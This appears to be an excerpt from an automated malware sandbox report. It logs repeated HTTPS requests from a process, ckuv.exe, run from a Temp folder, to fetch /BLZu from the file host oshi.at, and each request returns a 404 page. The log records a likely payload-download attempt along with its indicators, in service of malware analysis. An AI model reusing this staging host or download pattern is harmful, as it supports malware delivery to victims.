                                                                                                        Data Ascii: <a class="nav-link" href="/cmd">Command-line interface</a> </li> <li class="nav-item"> <a class="nav-link" href="/sharex">ShareX</a> </li> <li class="nav-item"> <a target="_blank" clas


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.449913194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:24 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:25 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:25 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:25 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.449924194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:26 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:27 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:26 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:27 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.449935194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:28 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:28 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:28 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:28 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.449945194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:29 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:30 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:30 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:30 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        36192.168.2.449961194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:31 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:33 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:33 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:33 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        37192.168.2.449977194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:35 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:36 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:35 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:36 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        38192.168.2.449990194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:37 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:37 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:37 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:37 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        39192.168.2.450004194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:39 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:39 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:39 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:39 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        40192.168.2.450013194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:41 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:41 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:41 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:41 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        41192.168.2.450029194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:42 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:43 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:43 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:43 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        42192.168.2.450040194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:44 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:45 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:45 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:45 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        43192.168.2.450049194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:46 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:46 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:46 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:46 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        44192.168.2.450050194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:48 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:48 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:48 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:48 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
